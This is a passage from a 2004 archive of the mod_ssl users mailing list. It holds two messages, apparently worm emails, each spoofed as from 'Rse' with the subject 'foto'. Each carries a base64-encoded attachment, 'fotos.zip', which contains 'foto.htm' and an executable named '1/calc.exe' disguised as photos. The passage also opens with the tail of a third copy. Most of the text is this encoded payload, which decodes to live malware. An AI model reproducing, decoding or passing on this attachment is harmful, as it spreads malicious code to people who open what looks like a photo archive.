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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------psrnrtjvqutxarnhpscq--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 13:36:09 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D8B31A8995; Wed,  1 Sep 2004 13:36:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from MARLON.com (200165172113.user.veloxzone.com.br [200.165.172.113])
	by master.modssl.org (Postfix) with SMTP id DAF59A8934
	for ; Wed,  1 Sep 2004 13:36:03 +0200 (CEST)
Date: Wed, 01 Sep 2004 08:33:27 -0300
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------tywcjvmlvgvvcbtaclgm"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------tywcjvmlvgvvcbtaclgm
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------tywcjvmlvgvvcbtaclgm
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------tywcjvmlvgvvcbtaclgm--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 14:01:41 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 72F4BA8A79; Wed,  1 Sep 2004 14:01:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from DAVEM.org (gwercoc.tor.axxent.ca [209.250.135.154])
	by master.modssl.org (Postfix) with SMTP id 03287A893D
	for ; Wed,  1 Sep 2004 14:01:38 +0200 (CEST)
Date: Wed, 01 Sep 2004 08:11:32 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------xrlmwzlmpklsomuczevc"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------xrlmwzlmpklsomuczevc
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------xrlmwzlmpklsomuczevc
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
